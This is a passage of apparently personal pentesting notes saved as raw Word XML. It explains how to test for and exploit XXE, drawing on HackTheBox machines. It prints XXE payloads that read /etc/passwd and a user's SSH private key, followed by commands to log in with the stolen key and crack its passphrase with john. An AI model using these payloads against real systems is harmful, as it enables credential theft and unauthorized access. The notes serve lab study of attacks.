      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[Mail]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C4F">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MAPI=1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C50">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[Ports]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C51">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">COM1:=9600,n,8,1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C52">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> has been processed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C53">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1238"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you do, then that means the website is vulnerable to XXE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C55">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C56">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the BountyHunter HTB, here was how they tested it:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C57">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C58">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?xml version="1.0" encoding="ISO-8859-1"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C59">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!DOCTYPE data [</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C5A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!ENTITY file SYSTEM "file:///etc/passwd"&gt; ]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C5B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;bugreport&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C5C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;title&gt;test&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C5D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;cwe&gt;test&lt;/cwe&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C5E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;cvss&gt;test&lt;/cvss&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C5F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;reward&gt;&amp;file;&lt;/reward&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C60">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/bugreport&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C61">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C62">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C63">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C64">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to exploit XXE:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C65">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C66">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">One thing we can do (as shown in the Markup HTB), is see that some of the source code of the pages is written by someone named daniel and then we see SSH is running on the target machine, so then we can look for their SSH key to log into their account via SSH. They can be found in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">c:/users/daniel/.ssh/id_rsa</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, assuming daniel is the username. So we can do this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C67">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C68">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?xml version="1.0"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C69">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C6A">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!DOCTYPE foo [</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C6B">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!ENTITY xxe SYSTEM "file:///c:/users/daniel/.ssh/id_rsa"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C6C">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C6D">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C6E">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">…rest of the XML code</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C6F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C70">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C71">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then, once you get the SSH key (make sure to include the "-----BEGIN OPENSSH PRIVATE KEY-----" and "-----END OPENSSH PRIVATE KEY-----"), you can then put it in a local file called id_rsa or anything like that, and then change the privileges of that file to readable only from the owner, which is the only format in which you can put private keys that are accepted by SSH.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C72">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C73">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">touch id_rsa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C74">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Subl id_rsa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C75">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">paste private key into it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C76">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Remember to add a blank trailing line at the end since that's how you format private keys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C77">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod 600 id_rsa </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C78">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This makes it only readable/writable by owner and NO OTHER privileges</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh -i id_rsa daniel@10.129.226.199</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If it says you need a passphrase, then crack it using ssh2john</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C7B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh2john id_rsa&gt; hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C7C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C7D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If this doesn't work, take a more elaborate approach to find the mode for cracking hash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C7E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5099941" cy="4380719"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="300" name="image284.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image284.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId271"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5099941" cy="4380719"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C7F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="2880" w:right="600" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We ignore the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
